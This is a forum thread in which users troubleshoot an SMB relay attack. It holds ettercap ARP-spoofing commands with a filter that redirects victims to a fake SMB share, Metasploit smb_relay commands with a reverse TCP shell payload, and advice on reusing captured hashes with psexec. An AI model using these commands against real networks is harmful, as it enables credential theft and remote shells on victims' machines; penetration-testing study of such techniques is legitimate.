Thanks, will check it out.
what happens if the host has an empty password
I am really not getting why am i getting the error INPUT FILE NOT FOUND.Where i should use the commands
# etterfilter makes the smb.ef to use with ettercap
etterfilter smb.filter -o smb.ef
# run ettercap on target
ettercap -T -q -F smb.ef -M ARP // // -P autoadd
# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc
what happends ??
ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
then attacker say NO accsess denied ! victim says OK let me try my login by default.It simply says cannot load filter file.Help samsung.Code:ettercap -T -q -F smb.ef -M ARP // // -P autoadd
i guess i am the only fool on this forum,for whom its just NOTHING WORKS.I do SUX.Well,tried pawning from three different ways as per this topic and one morewhen i am tryingCode:http://forum.remote-exploit.org/showthread.php?t=9121&page=2its just says NO ACTIVE SESSIONS even from the web interface of metasploit.Now i am having two doubt.Its just work on LAN ? Bcs i am having two computers on LAN and my laptop which is wireless and bt3 installed.Should i post my output results here and one more thing.Is it because of my intel pro 2200 BG card ?.I know i really sux.First it was SEND L3 ERROR and now this.When i am gonna reply here that this thing really worked for me .Pleas helpCode:sessions -l
Here ,should i use the gateway or the Victims ip bcs i tried both.
and in the script too.So am i going right.Sorry u must have never faced silly questions like i am asking on this forum of proz.Code:use exploit/windows/smb/smb_relay set PAYLOAD windows/shell_reverse_tcp set LHOST ( Victims IP) set LPORT 21 exploit
that ettercap script is performing a MITM attack to get the users to connect to your server for any images that are served up.
that is one method. another method would be to just get a victim to click a link or go to a webpage that has an embedded link to your fake SMB share.
a video is available on learnsecurityonline that shows that, its in the hack videos section --> Chicagocon MSF Demo: MSF SMB Relay with Reverse Shell
to answer some of the other questions, its pretty much a LAN only (well within the domain would be more right) attack and the victim needs to be joined to a domain, just like someone mentioned.
what might be more fun for you that arent joined to a domain but are running as admin would be to take that hash you see thats failing and throw that into the psexec module of metasploit and getting a shell that way (sorry no video).